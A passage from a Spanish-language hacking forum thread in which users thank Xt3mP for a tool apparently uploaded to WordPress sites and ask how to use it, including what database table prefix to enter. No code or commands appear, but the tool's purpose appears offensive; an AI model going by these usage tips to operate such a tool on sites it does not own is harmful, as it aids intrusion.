  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #5 en: Agosto 04, 2012, 03:04:59 pm »
Grande Xt3mP!

PD: Te arreglé el tag de Youtube, que no se veía.
« Última modificación: Agosto 06, 2012, 09:35:06 am por Pr0ph3t »
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

Desconectado xBluegrew

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
  • - Return´s -
    • Ver Perfil
    • Underc0de
    • Email
« Respuesta #6 en: Agosto 06, 2012, 01:03:44 am »
Se ve de maravilla, gracias.

Desconectado BlackBox

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #7 en: Septiembre 05, 2012, 06:36:45 pm »
Muy Buena Herramienta falta ver que viene con ella... :)

Desconectado Xt3mP

  • *
  • Underc0der
  • Mensajes: 432
  • Actividad:
    0%
  • Reputación 0
  • Ellos me están buscando, pero yo los encontraré.
    • MSN Messenger - Xt3mP@h4x0rz.us
    • AOL Instant Messenger - Xt3mP@h4x0rz.us
    • Yahoo Instant Messenger - Xt3mP@h4x0rz.us
    • Ver Perfil
    • Xt3mP
« Respuesta #8 en: Septiembre 06, 2012, 04:25:44 am »
Esperen a la versión 1.5 que ya tiene el módulo de joomla, y muchísimas mejoras tanto en código como en utilidades.
Cada vez que me das Karma me motivas

Desconectado xc0d3

  • *
  • Underc0der
  • Mensajes: 37
  • Actividad:
    0%
  • Reputación 0
  • root@xc0d3[#] ~Done
    • Ver Perfil
    • Email
« Respuesta #9 en: Septiembre 06, 2012, 03:05:09 pm »
(Y)
Tengo una pregunta que a veces me tortura "estoy loco yo o los locos son los demás”

Desconectado DLV

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: dlv.team
« Respuesta #10 en: Septiembre 15, 2012, 04:15:15 pm »
Sabes que Funciona de lujo Acabo de probarlo ! eso compradre muchas gracias por esto 1313 :D

Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 242
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #11 en: Septiembre 15, 2012, 07:43:40 pm »
Como funciona, bueno como lo puedo usar,
soy nuevo en estos temas. :-[ :-[






Desconectado 5TU4RT

  • *
  • Underc0der
  • Mensajes: 111
  • Actividad:
    0%
  • Reputación 0
  • Si se puede imaginar... se puede programar.!
    • Ver Perfil
    • Underc0de
    • Email
« Respuesta #12 en: Octubre 20, 2012, 02:17:00 pm »
Magnifica Tool Xt3mp..!!!  :D
 
Gracias por compartir...


Salu2
5TU4RT
Si se puede imaginar... se puede programar.!

Desconectado guilreto

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #13 en: Enero 12, 2013, 11:56:55 am »
Alguien me echa una manita y me ayuda a utilizarlo, porque no tengo idea de como funciona, si debo acceder como admin ya a la web para utilizar esto o me sirve sin acceder, no se, xD
Gracias si alguien me echa una mano.
Y gracias a Xt3mp

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #14 en: Enero 12, 2013, 01:20:43 pm »
Emm haber bro viste el video? que trae el post o solo hiciste un copy paste?

Seria bueno que veas el video asi te das una idea, no es por ser odioso ni nada luego de ello con gusto te echamos la mano ;) si la memoria no me falla en esta misma sección hay un tutorial de Okol que explica como subir a un WP

Saludos :P
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado guilreto

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #15 en: Enero 15, 2013, 02:21:44 pm »
Ok. gracias Snifer, le echare un ojo al tutorial de Okol, y si me encuentro con alguna dificultad os comento algo... :)

Desconectado PW[N]ED

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • PW[N]ED underc0de.-!
    • Ver Perfil
  • Skype: the.joker.crack
« Respuesta #16 en: Junio 03, 2013, 08:06:20 pm »
que pongo en Insert Wordpress DB Preffix

Desconectado Xt3mP

  • *
  • Underc0der
  • Mensajes: 432
  • Actividad:
    0%
  • Reputación 0
  • Ellos me están buscando, pero yo los encontraré.
    • MSN Messenger - Xt3mP@h4x0rz.us
    • AOL Instant Messenger - Xt3mP@h4x0rz.us
    • Yahoo Instant Messenger - Xt3mP@h4x0rz.us
    • Ver Perfil
    • Xt3mP
« Respuesta #17 en: Junio 03, 2013, 09:14:40 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
que pongo en Insert Wordpress DB Preffix

Es el prefijo de tabla, generalmente es wp_ por eso viene por default, en unos días libero la versión 1.5 con nueva estructura y adaptado para todos los casos.
Cada vez que me das Karma me motivas

Desconectado PW[N]ED

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • PW[N]ED underc0de.-!
    • Ver Perfil
  • Skype: the.joker.crack
« Respuesta #18 en: Junio 04, 2013, 11:50:37 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
que pongo en Insert Wordpress DB Preffix

Es el prefijo de tabla, generalmente es wp_ por eso viene por default, en unos días libero la versión 1.5 con nueva estructura y adaptado para todos los casos.


pero de donde saco el prefijo , cada ves que lo intento hacer me dice que no es el prefijo :S , donde saco el prefijo

Desconectado Xt3mP

  • *
  • Underc0der
  • Mensajes: 432
  • Actividad:
    0%
  • Reputación 0
  • Ellos me están buscando, pero yo los encontraré.
    • MSN Messenger - Xt3mP@h4x0rz.us
    • AOL Instant Messenger - Xt3mP@h4x0rz.us
    • Yahoo Instant Messenger - Xt3mP@h4x0rz.us
    • Ver Perfil
    • Xt3mP
« Respuesta #19 en: Junio 04, 2013, 09:21:26 pm »
Revisando la configuración en la base de datos, o intenta hacer que el script lo saque automáticamente.
Cada vez que me das Karma me motivas

 

¿Te gustó el post? COMPARTILO!